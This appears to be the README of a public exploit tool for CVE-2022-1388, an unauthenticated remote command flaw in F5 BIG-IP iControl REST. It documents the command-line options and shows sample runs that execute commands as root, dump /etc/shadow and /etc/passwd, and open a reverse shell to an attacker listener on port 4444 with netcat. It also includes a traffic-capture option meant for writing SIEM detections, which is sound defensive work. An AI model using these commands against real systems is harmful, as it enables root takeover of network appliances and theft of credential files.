The author is not responsible or held liable for any actions taken with any aspect of this project/repository. I created this for the purposes of understanding the attack as well as writing detections within a SIEM and wanted to share for others to do the same. Use at your own risk.
This exploit targets the BIG-IP iControl REST vulnerability CVE-2022-1388 in F5 Systems. Please see the F5 advisory (https://support.f5.com/csp/article/K23605346) for affected versions and other information.
Feel free to PR or report any issues. This was tested on a few vulnerable F5 VE in Google Cloud from a CentOS machine with Python 3.6
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET, --RHOSTS TARGET
Target IP of vulnerable BIG-IP system
-p PORT, --port PORT, --RPORT PORT
Target port on vulnerable BIG-IP system
-c CMD, --cmd CMD, --command CMD
Command to run on target system
-e, --export, --tcpdump
Export captured traffic and ssl-key.log | **Requires sudo privileges!
-q, --quiet Don't display banner
-s, --shell Launch an interactive shell
-lh LHOST, --lhost LHOST, --LHOST LHOST
Required for -s [shell]; Local IP/interface to bind listener to
-lp LPORT, --lport LPORT, --LPORT LPORT
Required for -s [shell]; Local port to bind listener to
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...
[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
Specifiying the -e (--export) flag will create two files: detection.pcap and ssl-key.log. These files will be overwritten every time the -e flag is specifed, so remember to move or rename the files you wish to keep. The ssl-key.log can be imported into Wireshark via Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename to decrypt the TLS session. Note that because of tcpdump, when using -e, the script must be run as sudo.
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
Before TLS Decryption:
Adding the automatically-exported ssl-key.log to the TLS preferences in Wireshark:
After TLS Decryption:
